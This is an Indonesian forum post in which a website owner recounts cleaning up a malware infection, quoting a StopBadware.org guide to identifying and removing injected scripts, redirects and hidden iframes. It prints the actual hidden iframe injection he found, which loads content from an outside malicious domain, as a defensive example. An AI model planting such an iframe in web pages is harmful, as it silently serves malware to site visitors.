:.
Assalamu'alaikum..
Hapunten kanggo agan² umpami subject this thread terlalu berlebihan..
Sebenernye sih ane nulis ini, cuma mau share sedikit pengalaman ane ama yang namanye malware yang udeh nyerang salah dua website yang ane urus [http://www.jrberikari.com & http://www.ajimut.com] [kejadiannye tanggal 14.04.2010:02.30pm]..
Waktu ane mau buka website ntu yang muncul malah tampilan kaya gini..
[/spoiler]
Karna ane penasaran coba buka lewat search engine google,
eh, malah keluar peringatan..
[spoiler]
[/spoiler]
Sesuai petunjuk google, ane buka tuh StopBadware.org
Isi salah satu artikel website ini.
[spoiler]
This page provides information about identifying, removing, and preventing badware on your website. It does not cover every situation, only the most common cases that we see at StopBadware. Some cases may require further assistance from security professional. You may also find additional information and volunteer assistance in our online community.
We provide this advice as-is and cannot guarantee the results of following it. Like you, we do the best we can.
There are three basic steps to restoring and maintaining a clean website:
1. Identifying badware behavior
2. Removing the badware behavior
3. Preventing future infection
Identifying badware behavior
The first step to keeping your website badware-free is to check for any badware or badware behaviors that may already be on your site.
What to look for
The three most common forms of badware that StopBadware sees on compromised sites are:
1. Malicious scripts
2. .htaccess redirects
3. Hidden iframes
Malicious scripts
Malicious scripts are often used to redirect site visitors to a different website and/or load badware from another source. These scripts will often be injected by an attacker into the content of your web pages, or sometimes into other files on your server, such as images and PDFs. Sometimes, instead of injecting the entire script into your web pages, the attacker will only inject a pointer to a .js or other file that the attacker saves in a directory on your web server.
Many malicious scripts use obfuscation to make them more difficult for anti-virus scanners to detect:
Some malicious scripts use names that look like they’re coming from legitimate sites (note the misspelling of “analytics”):
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a hidden server file called .htaccess to configure certain access settings for directories on the website. Attackers will sometimes modify an existing .htaccess file on your web server or upload new .htaccess files to your web server containing instructions to redirect users to other websites, often ones that lead to badware downloads or fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another page or site. Attackers will often inject malicious iframes into a web page or other file on your server. Often, these iframes will be configured so they don’t show up on the web page when someone visits the page, but the malicious content they are loading will still load, hidden from the visitor’s view.
picture of a hidden iframe injected in a web page
How to look for it
If your site was reported as a badware site by Google, you can use Google’s Webmaster Tools to get more information about what was detected. This includes a sampling of pages on which the badware was detected and, using a Labs feature, possibly even a sample of the bad code that was found on your site. Certain information can also be found on the Google Diagnostics page, which can be found by replacing example.com in the following URL with your own site’s URL: http://www.google.com/safebrowsing/diag ... xample.com
There exist several free and paid website scanning services on the Internet that can help you zero in on specific badware on your site. There are also tools that you can use on your web server and/or on a downloaded copy of the files from your website to search for specific text. StopBadware does not list or recommend such services, but the volunteers in our online community will be glad to point you to their favorites.
Removing the badware behavior
Once you have located the code that is causing the badware behavior, removing it is often as simple as deleting the offending code from all files in which it appears. Sometimes, it is easier, if you have a clean backup of your site’s contents, to re-upload all of the site’s files, though be careful about overwriting files that may have changed since your last backup. In some cases, the bad content may be stored in one or more database records, in which case restoring a recent backup of the database or manually editing the relevant records may be necessary.
Preventing future infection
Preventing badware on your website requires protecting three things: your site itself, the password(s) used to upload content to the site, and the computer(s) used to upload content to the site. The site itself must be protected because attackers often look for vulnerable software to exploit so they can modify your site’s contents. The passwords are critical because, if they are guessed or stolen, they can be used to modify the site. Finally, computers are important because badware on your computer can steal your password and/or modify the contents that you are uploading.
Protect your site
* Ensure that any software you use (e.g., blogging software like WordPress, third party scripts, etc.) is kept up to date with the latest security fixes, either by you (if you installed the software) or by your hosting provider.
* Remove any scripts, services, or other software that you are no longer using.
* Change any default passwords that come with the software you are using.
* Use appropriate file permissions on your web server.
Protect your password
* Use a strong password and change it occasionally, especially if you have reason to think it has been compromised.
* Tips for choosing and protecting a strong password can be found at this helpful page
Protect your computer
* See our guide to preventing badware on your computer
Additional resources
Two members of our online community have guides to cleaning a badware-infected website:
* How to prevent your website from getting hacked & repair a damaged site
* Practical Guide to Dealing With Google’s Malware Warnings[/spoiler]
Selesai baca ntu, ane langsung praktekin dah..
Alhasil ane nemu salah satu yang di sebutin diatas yaitu hidden iframes..
Nich kaya ginih..
- Code: Select all
<iframe src="http://baidustatz.com/lib/index.php" width=0 he
ight=0 style="hidden" frameborder=0 marginheight=0 marginwid
th=0 scrolling=no></iframe>
Ane hapus dah semuanye iframe yang seharusnye ngga ada ntu..
Tapi ane masih penasaran ama http://baidustatz.com..
Ane search lagi dah di google..
Trus ane dapet inpoh kaya gini..
[spoiler]
[/spoiler]
Untuk menjaga terjadinye hal kaye gitu..
* Pastikan bahwa software yang agan pake (misalnya, software blogging kaye WordPress, script pihak ketiga, dll) tetap up to date dengan perbaikan keamanan terbaru, baik ama agan atau oleh penyedia hosting agan.
* Hapus semua script, events, atau software laen yang agan engga pake lagi.
* Ubah password default apapun yang datang dengan software yang agan pake.
* Pake hak akses file yang sesuai pada server Web agan.
Segitu aje kali ye...
Semoga bermanfaat buat agan²...
Sumbernye : http://forum.ict-foundation.net/viewtop ... f=34&t=191
Postingan
0 komentar:
Posting Komentar